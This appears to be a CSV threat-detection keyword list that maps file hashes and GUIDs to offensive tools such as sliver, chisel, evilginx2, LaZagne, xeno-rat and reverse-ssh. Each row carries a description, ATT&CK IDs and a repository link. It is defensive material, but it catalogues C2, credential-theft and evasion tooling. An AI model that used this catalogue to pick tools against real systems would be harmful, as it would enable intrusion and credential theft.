"*8215225624132cd5a3c16699071178bea0fc91cd6195f67d1a5e8094142dcfe1*",".{0,1000}8215225624132cd5a3c16699071178bea0fc91cd6195f67d1a5e8094142dcfe1.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*82277B35-D159-4B44-8D54-FB66EDD58D5C*",".{0,1000}82277B35\-D159\-4B44\-8D54\-FB66EDD58D5C.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","N/A","10","8","796","162","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" "*82296b7a1d8b420d648c3ca0aa9f6560d11729d3fb97f534f03afd10a6d6460b*",".{0,1000}82296b7a1d8b420d648c3ca0aa9f6560d11729d3fb97f534f03afd10a6d6460b.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*823c3d2bbca46e7aedadfef6893babcbf14b0182e598a9ba958b84892daaeeb1*",".{0,1000}823c3d2bbca46e7aedadfef6893babcbf14b0182e598a9ba958b84892daaeeb1.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & 
Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*826edaeac303c78994a597c1e2ea0ce81c4ab628138b78677517661c32653523*",".{0,1000}826edaeac303c78994a597c1e2ea0ce81c4ab628138b78677517661c32653523.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*82ac960f25131540ae230b2bac0f003ffc8edc8a05382d8831ff8e8ebf30996d*",".{0,1000}82ac960f25131540ae230b2bac0f003ffc8edc8a05382d8831ff8e8ebf30996d.{0,1000}","offensive_tool_keyword","prefetch-tool","Windows KASLR bypass using prefetch side-channel CVE-2024-21345 exploitation","T1564.007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/exploits-forsale/prefetch-tool","1","0","N/A","8","1","47","7","2024-04-26T05:40:32Z","2024-04-26T05:00:27Z" "*82af85387456fa6a4f598d88cd6f575803e1878d17aacd765c1c6fc19ab9edf3*",".{0,1000}82af85387456fa6a4f598d88cd6f575803e1878d17aacd765c1c6fc19ab9edf3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*82B0EE92-347E-412F-8EA2-CBDE683EDA57*",".{0,1000}82B0EE92\-347E\-412F\-8EA2\-CBDE683EDA57.{0,1000}","offensive_tool_keyword","SignToolEx","Patching signtool.exe to accept expired certificates for code-signing","T1553.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/hackerhouse-opensource/SignToolEx","1","0","N/A","8","3","253","39","2023-12-29T15:08:41Z","2023-12-29T14:26:45Z" "*82b60e805fb8886732eedb461ae540482335cdaf0b3296e8388cbf416371e194*",".{0,1000}82b60e805fb8886732eedb461ae540482335cdaf0b3296e8388cbf416371e194.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*82b695eb37bf703a0c7fb9242f50aff9dfa000d464c5b2c368a8693a5d1adf63*",".{0,1000}82b695eb37bf703a0c7fb9242f50aff9dfa000d464c5b2c368a8693a5d1adf63.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*82d331f75a99d1547e0ccc3c3efd0a7a*",".{0,1000}82d331f75a99d1547e0ccc3c3efd0a7a.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*82dcce571a813e9a942b3a6f0c8eb8d557fa29ce50c9ea5516526a62671fc153*",".{0,1000}82dcce571a813e9a942b3a6f0c8eb8d557fa29ce50c9ea5516526a62671fc153.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*82F417BE-49BF-44FF-9BBD-64FECEA181D7*",".{0,1000}82F417BE\-49BF\-44FF\-9BBD\-64FECEA181D7.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*83035080-7788-4EA3-82EE-6C06D2E6891F*",".{0,1000}83035080\-7788\-4EA3\-82EE\-6C06D2E6891F.{0,1000}","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","0","N/A","9","3","228","43","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z" "*8304a65e6096bcf63f30592b8049d47883c3c755600796c60a36c4c492f7af37*",".{0,1000}8304a65e6096bcf63f30592b8049d47883c3c755600796c60a36c4c492f7af37.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" 
"*833d68452ea956b5d23bcb243cd327bd05dfd79fb5a4a34064783749eafa1ddf*",".{0,1000}833d68452ea956b5d23bcb243cd327bd05dfd79fb5a4a34064783749eafa1ddf.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002?","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","0","N/A","10","10","1024","151","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z" "*835747f27a37aa3fab9a116d7480701b813c16eba6b903eb82b96fa230aa992e*",".{0,1000}835747f27a37aa3fab9a116d7480701b813c16eba6b903eb82b96fa230aa992e.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002?","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","0","N/A","10","10","1024","151","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z" "*835747f27a37aa3fab9a116d7480701b813c16eba6b903eb82b96fa230aa992e*",".{0,1000}835747f27a37aa3fab9a116d7480701b813c16eba6b903eb82b96fa230aa992e.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. 
The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002?","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","0","N/A","10","10","1024","151","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z" "*83b1ddfa24d6f81fcae9fe687185dab70e97957b471a32e69d88d9b0acfb9d7a*",".{0,1000}83b1ddfa24d6f81fcae9fe687185dab70e97957b471a32e69d88d9b0acfb9d7a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*84008e4aef450b5bab0d589b59174fa9633820448d167bae94b00fe5f62d788c*",".{0,1000}84008e4aef450b5bab0d589b59174fa9633820448d167bae94b00fe5f62d788c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*8405dcb456eb56be5a810d5189996286ccf9da781705ac1788644cf91487ee8b*",".{0,1000}8405dcb456eb56be5a810d5189996286ccf9da781705ac1788644cf91487ee8b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" 
"*84276ef1f62be4767fa91b3fe35f58b9a1d4e291415723346dd090a85d668289*",".{0,1000}84276ef1f62be4767fa91b3fe35f58b9a1d4e291415723346dd090a85d668289.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*847D29FF-8BBC-4068-8BE1-D84B1089B3C0*",".{0,1000}847D29FF\-8BBC\-4068\-8BE1\-D84B1089B3C0.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*8489A9CE-AB1A-4D8D-8824-D9E18B9945FE*",".{0,1000}8489A9CE\-AB1A\-4D8D\-8824\-D9E18B9945FE.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*8493D0F0-CA01-4C5A-A6E3-C0F427966ABD*",".{0,1000}8493D0F0\-CA01\-4C5A\-A6E3\-C0F427966ABD.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. 
Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*84b50a32ee55280e0f5c68a772b25b3efa489125f75057b03ec31156c19b4041*",".{0,1000}84b50a32ee55280e0f5c68a772b25b3efa489125f75057b03ec31156c19b4041.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*84d265868a788a2888bcfa2c6d34021670787c23a4bdd60fca1334248cd1f3c7*",".{0,1000}84d265868a788a2888bcfa2c6d34021670787c23a4bdd60fca1334248cd1f3c7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*84d92157948ff717a224b4dd81ceae8e300b9b363293d6417da97925b4c59ba9*",".{0,1000}84d92157948ff717a224b4dd81ceae8e300b9b363293d6417da97925b4c59ba9.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*84dbd3a0c2e858b59822ee50b7d72972851ca692416c15c5f351831381aa4db9*",".{0,1000}84dbd3a0c2e858b59822ee50b7d72972851ca692416c15c5f351831381aa4db9.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*84e1091e97d33b0b8ae7c600f649e0cbaf00c1b7650d965ba4ef903eee709550*",".{0,1000}84e1091e97d33b0b8ae7c600f649e0cbaf00c1b7650d965ba4ef903eee709550.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - 
TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*84e42cfadcc56fd72ad041ad692cc880eede230412bd6cdc3bcf90523b10a98e*",".{0,1000}84e42cfadcc56fd72ad041ad692cc880eede230412bd6cdc3bcf90523b10a98e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*84f191e9992ba2fd44147adea679f3315d3bc3a21d3c3267425017711a240da7*",".{0,1000}84f191e9992ba2fd44147adea679f3315d3bc3a21d3c3267425017711a240da7.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*84fca6c04d81477223b295838e3edb59744fc564c68c614b93c33a537a066bd6*",".{0,1000}84fca6c04d81477223b295838e3edb59744fc564c68c614b93c33a537a066bd6.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" 
"*8524836909172fcdcfc6c1e805d775bdf84a499113a645d2fce7797d89af6dc7*",".{0,1000}8524836909172fcdcfc6c1e805d775bdf84a499113a645d2fce7797d89af6dc7.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*853d769d63efcbc5d78f3f81c7cae176bf34c248d3bbbf6f32b4bc5d5de561e8*",".{0,1000}853d769d63efcbc5d78f3f81c7cae176bf34c248d3bbbf6f32b4bc5d5de561e8.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*85474d2a885a2dbe2dfd334d9d25fbf1079c1d88c857428e2e1cf3e59f2c0a9b*",".{0,1000}85474d2a885a2dbe2dfd334d9d25fbf1079c1d88c857428e2e1cf3e59f2c0a9b.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*854A20FB-2D44-457D-992F-EF13785D2B51*",".{0,1000}854A20FB\-2D44\-457D\-992F\-EF13785D2B51.{0,1000}","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - 
T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","0","N/A","10","4","340","45","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z" "*8574d9733f8ab02facc74b6b2e51a5a0f4eb5c370e005de4987586cb53b52314*",".{0,1000}8574d9733f8ab02facc74b6b2e51a5a0f4eb5c370e005de4987586cb53b52314.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*857d1a53ab8df17acd27c5a26a77cdf070b2cd6e78bcbf011eef3c81dd5cd9ae*",".{0,1000}857d1a53ab8df17acd27c5a26a77cdf070b2cd6e78bcbf011eef3c81dd5cd9ae.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*85a5981495372d449656d4da528a0884e3bf06307f0e52756823cd474a687cc6*",".{0,1000}85a5981495372d449656d4da528a0884e3bf06307f0e52756823cd474a687cc6.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*85ef86a80dfd91208cf5eaaafd220a584c591ed83c22ee039b31b9849d7428d0*",".{0,1000}85ef86a80dfd91208cf5eaaafd220a584c591ed83c22ee039b31b9849d7428d0.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output 
or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*85fcc2b2c19bc9355cbe509a9ef3ebe10005f1c8a9887df12a6295f25008d260*",".{0,1000}85fcc2b2c19bc9355cbe509a9ef3ebe10005f1c8a9887df12a6295f25008d260.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*861c5434860a97737943516d0e93e91f5484c8ea557672763ab55bb8c4bbc979*",".{0,1000}861c5434860a97737943516d0e93e91f5484c8ea557672763ab55bb8c4bbc979.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" 
"*862a3fb241e9b9e821a5612e1dd5f7565aefdaee978bef994bc4817d9711409d*",".{0,1000}862a3fb241e9b9e821a5612e1dd5f7565aefdaee978bef994bc4817d9711409d.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*862DA0DA-52E1-47CD-B9C2-46B106031B28*",".{0,1000}862DA0DA\-52E1\-47CD\-B9C2\-46B106031B28.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*862f7ba58bbf77543812637ecc32d277fce062d21bc97587e5816e8fb05634e3*",".{0,1000}862f7ba58bbf77543812637ecc32d277fce062d21bc97587e5816e8fb05634e3.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*863e5c3db9d52c8af4ad2976dbfe510a8eaaec2affba50a5abd916e440e18804*",".{0,1000}863e5c3db9d52c8af4ad2976dbfe510a8eaaec2affba50a5abd916e440e18804.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. 
